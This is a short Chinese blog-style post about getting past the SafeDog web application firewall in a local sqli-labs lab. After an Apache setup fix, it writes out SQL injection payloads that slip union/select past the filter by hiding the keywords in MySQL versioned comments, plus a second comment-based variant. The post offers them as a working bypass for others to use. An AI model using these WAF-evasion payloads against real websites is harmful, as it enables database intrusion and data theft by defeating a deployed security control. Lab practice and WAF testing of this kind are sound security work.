环境搭建:
phpstudy+sqli-labs-master
安全狗版本:
出现问题:新版安全狗Apache服务无法启动问题
管理员模式启动cmd,进入phpstudy部署目录phpstudy_pro\Extensions\Apache2.4.39\bin下
执行命令:httpd -k install -n apache2.4
环境搭建完毕,验证安全狗正常拦截
开搞开搞!!!
从上面验证看来就是针对union 和select的组合进行拦截
网上研究了一早上都不行,就在差点放弃的时候看到一位老哥的分享,搞定!!!
?id=-1/**//*!60000xxx*//*!union*//**//*!60000xxx*//*!select*//**/1,2,3
/*!60000*/含义是mysql版本6以上才会执行中间的参数
之前试过?id=-1/**//*!50000union*//**//*!50000select*//**/1,2,3也不行,没想到/*!60000xxx*/这个操作,估计安全狗下个版本这个也搞不定了,如果大佬们有其他方法还请分享交流!
参考
https://www.freebuf.com/news/topnews/253220.html
?id=-1 union /*//–/*/ select 1,2,3(这个也行
参考文章
)